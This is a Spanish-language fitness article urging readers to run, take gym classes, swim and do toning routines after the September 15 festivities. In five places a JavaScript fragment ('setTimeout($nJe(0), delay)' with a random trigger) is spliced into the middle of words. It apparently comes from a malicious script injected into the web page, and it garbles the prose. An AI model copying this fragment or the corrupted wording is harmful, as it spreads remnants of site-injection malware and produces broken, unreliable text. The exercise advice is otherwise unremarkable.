Deja el arrepentimiento de los excesos atrás y dale al ejercicio

    Deja el arrepentimiento de los excesos atrás y dale al ejercicio

    Los excesos del 15 de septiembre no pueden detener tus entrenamientos.

    Autor: Elizabeth Rivera 12 septiembre, 2019


    FOTO: Shutterstock

     

    Para mantener tu condición en estas fiestas agrega uno de estos ejercicios a tu día.

     

    Sabemos que ya es la recta final del año y que de aquí a diciembre, todo es comer y festejar. Sin embargo, te recordamos que es importante mantenerte en forma y cuidar tu salud. No está mal que peques pero después, hay que compensar.

    Pensandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en lo que nos espera luego de la celebración del grito (exceso de comida y mucho alcohol) te preparamos algunos consejos infalibles para que regreses a tu camino y logres mantenerte enfocado el resto el año. Lo has estado haciendo muy bien y queremos ayudarte a que no por una buena celebración dejes de hacer ejercicio. Así que pon atención y aunque cueste trabajo, ¡ponte las pilas! Nos lo vas agradecer. 

    No olvides consultar con un experto antes.

     

    Sal a correr

    La rutina básica que te proponemos es la de salir a correr. Ya pasó el fin de semana del grito y sabes que te pasaste un poquito con el pozole y las tostadas. Pero también te da flojera ir al gimnasio. Bueno, en lo que vuelves a agarrar ritmo o, si no has hecho nada todo el año pero estas fiestas te dejaron sentimiento de culpa, lo más sencillo es salir a correr. 

    Combina caminar con correr. Por ejemplo, camina 5 minutos y corre uno. Repite 5 veces.

     

     

    Clases en el gimnasio

    Si ya tienes un lugar a donde ir a hacer ejercicio, tu mejor opción para recuperarte de los excesos es una buena clase de intensidad, como boxeo o spinning. Cualquier cosa que haga subir tus pulsaciones estará ayudándote a perder un montón de calorías. 

    Procura que las clases tengan una duración mínima de 45 minutos y máxima de 60. 

     

    Natación

    Nadar es uno de los mejores ejercicios que puedas hacer, pues durante el entrenamiento estarás utilizandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando todos los músculos del cuerpo. Además, tus pulmones y corazón te lo van a agradecer mucho. 

    Empieza nadandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando poco y ve aumentandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando progresivamente hasta nadar uno o dos kilómetros. 

     

     

    Tonifica

    Recuerda que no todo es perder calorías, también tienes que tonificar tu cuerpo. Para esto, te recomendamos, luego de tu sesión de cardio, una rutina de ejercicios como abdominales, sentadillas, lagartijas y flexiones. 

    Trabaja un grupo muscular por día, no quieras acaparar todos en una sesión pues sólo lograrás cansarte y abandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andonar todo. 

     

     

    ESTAS PLANCHAS TRABAJARÁN TODO TU ABDOMEN Y MÁS

     

    Temas relacionados con esta nota: , , ,

Los excesos del 15 de septiembre no pueden detener tus entrenamientos.